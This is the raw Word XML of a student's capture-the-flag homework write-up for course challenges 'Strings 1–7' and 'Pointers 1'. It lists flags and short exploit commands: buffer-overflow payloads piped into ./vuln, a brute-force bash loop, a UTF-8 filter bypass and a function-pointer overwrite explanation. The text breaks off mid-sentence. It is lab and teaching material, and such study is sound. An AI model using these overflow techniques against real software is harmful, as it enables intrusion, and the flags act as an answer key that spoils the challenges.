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0C7B" w14:textId="5FADF3BB" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>–CTF Username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FD479" w14:textId="2F6C2F64" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>–Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C727A8" w14:textId="6462DCBA" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>–Vulnerability: Explain the vulnerability in the program, and explain conceptually how that vulnerability can be exploited to get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0149420F" w14:textId="3FBABDC3" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>–Exploit: How did you exploit the vulnerability? List the steps taken and the reasoning behind each step. The TA grading should be able to replicate the exploit following the steps. Feel free to make references to your code! Note that ”use XYZ tool” is not sufficient - you must explain how the tool derived the answer for full credit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277EDBF" w14:textId="7A0EB4C8" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>–References: List resources outside of class material that helped you solve this problem. This includes online video tutorials, other CTF problems on other platforms, etc. Remember that source code avail- able online (e.g. stackoverflow) also needs to be cited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE8B058" w14:textId="213A5FC8" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>–Source code: Append your source code in the same write-up. Your source code should be readable from the write-up PDF itself. Note that this does not count towards the page count above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C2245E" w14:textId="432BB5D4" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFA027D" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strings 1 (01-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285631B5" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBDB37D" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1a74ec40305b58d27d6de378db99b632</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419B87DE" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8381A" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> python -c "print 109*'a' + '\x86\x85\x04\x08'" | ./vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CF8DD" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401"/>
    <w:p w14:paraId="680385C7" w14:textId="339E6C4F" w:rsidR="00D44401" w:rsidRPr="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strings 2 (01-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A30005A" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8A6D76" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ee2b13254eaaad6a205f53bdf614a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F962FDE" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB735FC" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> python -c "print 32*'a'" | ./vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3A401D" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401"/>
    <w:p w14:paraId="57BA76DE" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strings 3 (01-3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E10D0E7" w14:textId="77777777" w:rsidR="009D734B" w:rsidRDefault="009D734B" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162B1DDD" w14:textId="46218E06" w:rsidR="009D734B" w:rsidRDefault="009D734B" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009D734B">
        <w:t>5640b5f12ccc87979fc3eb3872695ba3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F256927" w14:textId="77777777" w:rsidR="009D734B" w:rsidRPr="00D44401" w:rsidRDefault="009D734B" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558FF3CE" w14:textId="77777777" w:rsidR="009D734B" w:rsidRDefault="009D734B" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1E5200" w14:textId="77777777" w:rsidR="009D734B" w:rsidRDefault="009D734B" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="293FA3AF" w14:textId="20605479" w:rsidR="009D734B" w:rsidRDefault="009D734B" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>The check for if the inputted filename was equal to “flag.txt” came before the copyRemoveUTF8 function. The purpose of that function was to remove any characters did not appear in the ascii table (whose values were greater than or equal to 0x80). By providing the filename “</w:t>
      </w:r>
      <w:r w:rsidRPr="009D734B">
        <w:t>fµlag.txt</w:t>
      </w:r>
      <w:r>
        <w:t>”, the filename check would detect anything and the copyRemoveUTF8 function would strip out the ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="009D734B">
        <w:t>µ</w:t>
      </w:r>
      <w:r>
        <w:t>’ character</w:t>
      </w:r>
      <w:r w:rsidR="00017890">
        <w:t xml:space="preserve">. The program would then continue on to read flag.txt and yield the flag: </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00017890" w:rsidRPr="009D734B">
        <w:t>5640b5f12ccc87979fc3eb3872695ba3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A956C64" w14:textId="1BC7AA35" w:rsidR="00017890" w:rsidRDefault="00017890" w:rsidP="009D734B">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D985D3" wp14:editId="14EFCFF0">
            <wp:extent cx="5934075" cy="5524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934075" cy="552450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49233531" w14:textId="77777777" w:rsidR="00711A52" w:rsidRDefault="00711A52" w:rsidP="00D44401">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7872D474" w14:textId="6C3F061A" w:rsidR="009D734B" w:rsidRPr="00B64345" w:rsidRDefault="00711A52" w:rsidP="00711A52">
      <w:pPr>
        <w:ind w:left="3600"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B64345">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00B64345">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Strings 4 (01-6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FFF57B" w14:textId="77777777" w:rsidR="00711A52" w:rsidRDefault="00711A52" w:rsidP="003359E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9E013A" w14:textId="586F6EF1" w:rsidR="009D734B" w:rsidRPr="003359E5" w:rsidRDefault="003359E5" w:rsidP="003359E5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003359E5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strings 5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(01-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="000872B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DADE836" w14:textId="47FCAA94" w:rsidR="003359E5" w:rsidRDefault="003359E5" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4328BD51" wp14:editId="46D88F0D">
            <wp:extent cx="59436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250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D42C936" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="000872B0" w:rsidRDefault="00D44401" w:rsidP="000872B0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000872B0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strings 6 (01-6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C16B26" w14:textId="77777777" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27387B94" w14:textId="26A0C14C" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872B0">
        <w:t>6e5098e44fdcd68f5a77aa20b996cbda</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE9B063" w14:textId="77777777" w:rsidR="000872B0" w:rsidRPr="00D44401" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EEC98A" w14:textId="002450C9" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872B0">
        <w:t>python -c "print 145*'a' + '\x16\x86\x04\x08'" | ./vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BF023" w14:textId="72781C45" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04E17C12" w14:textId="38E8BA51" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53407B2F" wp14:editId="4B659AC0">
            <wp:extent cx="5617029" cy="860425"/>
            <wp:effectExtent l="0" t="0" r="317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8"/>
                    <a:srcRect l="1598" t="7749" r="3795" b="17309"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5623022" cy="861343"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1AD83B" w14:textId="42E618A4" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="104C10D1" w14:textId="77777777" w:rsidR="000872B0" w:rsidRDefault="000872B0" w:rsidP="000872B0">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F38EAC" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="00775DA8" w:rsidRDefault="00D44401" w:rsidP="00775DA8">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00775DA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Strings 7 (01-7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643F033" w14:textId="77777777" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5762D09C" w14:textId="26BF4DD7" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00775DA8">
        <w:t>01fa3cb9b61eff51902d93a1e8f53841</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E9C2B9" w14:textId="77777777" w:rsidR="00775DA8" w:rsidRPr="00D44401" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351DB999" w14:textId="41AD8AEE" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33D9E3" w14:textId="7E192F2E" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57680B03" wp14:editId="4D7B5705">
            <wp:extent cx="5743575" cy="19621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743575" cy="1962150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A316D9" w14:textId="77777777" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2733EE40" w14:textId="4B318408" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00775DA8">
        <w:lastRenderedPageBreak/>
        <w:t>for((i=0;i&lt;50;i+=1)); do echo $i; python -c "print '500\n'+128*'z'+'01fa'+$i*'z'+'\xc6\x86\x04\x08'" | ./vuln; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1746909E" w14:textId="77777777" w:rsidR="00775DA8" w:rsidRDefault="00775DA8" w:rsidP="00775DA8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB63095" w14:textId="38A332E8" w:rsidR="00D44401" w:rsidRDefault="00775DA8" w:rsidP="00D44401">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67E4BA2E" wp14:editId="4CC776FD">
            <wp:extent cx="5429250" cy="13335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429250" cy="1333500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="67728A42" w14:textId="77777777" w:rsidR="00D44401" w:rsidRPr="00761348" w:rsidRDefault="00D44401" w:rsidP="00761348">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00761348">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pointers 1 (02-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302F06C8" w14:textId="77777777" w:rsidR="00D44401" w:rsidRDefault="00D44401" w:rsidP="00D44401">
      <w:r>
        <w:t>Please connect to the CTF server and solve: Pointers 1 (02-1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F655016" w14:textId="77777777" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CTF Username:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> node1hometree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBE34EE" w14:textId="0BADD9D3" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00761348">
        <w:t>42fcc2231c8d68998bad7e7c510cca6f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28017F9B" w14:textId="77777777" w:rsidR="00761348" w:rsidRPr="00D44401" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C891B93" w14:textId="5F79B8CC" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44401">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE15A39" w14:textId="1315CDFE" w:rsidR="00761348" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="171394C9" w14:textId="0A762FF3" w:rsidR="003645D2" w:rsidRDefault="00761348" w:rsidP="00761348">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>In order to call the win function, its address needed to be loaded into the function pointer. To get to the function pointer’s address however, the buffer needed to be overflowed. By using gdb’s print feature, I found the address of the buf variable (</w:t>
      </w:r>
      <w:r w:rsidRPr="00761348">
        <w:t>0x804a080</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) and the address of the funcPtr </w:t>
      </w:r>
      <w:r w:rsidR="003645D2">
        <w:t>variable (</w:t>
      </w:r>
      <w:r w:rsidR="003645D2" w:rsidRPr="003645D2">
        <w:t>0x804a060</w:t>
      </w:r>
      <w:r w:rsidR="003645D2">
        <w:t>). When the program asks what location in the buffer I experimented with a few values and printed that index’s address. I found that by entering a “-8” value, buf[-8]’s address was the same as the funcPtr variables’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082B68B2" w14:textId="6FA926E7" w:rsidR="00761348" w:rsidRDefault="003645D2" w:rsidP="003645D2">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68E56EB2" wp14:editId="42891894">
            <wp:extent cx="2971800" cy="85725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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2971800" cy="857250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47465AF6" w14:textId="5269241D" w:rsidR="003645D2" w:rsidRDefault="003645D2" w:rsidP="003645D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Then the program asks what you would like in that location. It asks for an integer which it then stores at the previously requested index. In order to give if the address of the win function, the address (0x0</w:t>
      </w:r>
      <w:r w:rsidRPr="003645D2">
        <w:t>80485e6</w:t>
      </w:r>
      <w:r>
        <w:t>) was converted to a decimal</w:t>
      </w:r>
      <w:r w:rsidR="001C3E80">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="001C3E80" w:rsidRPr="001C3E80">
        <w:t>134514150</w:t>
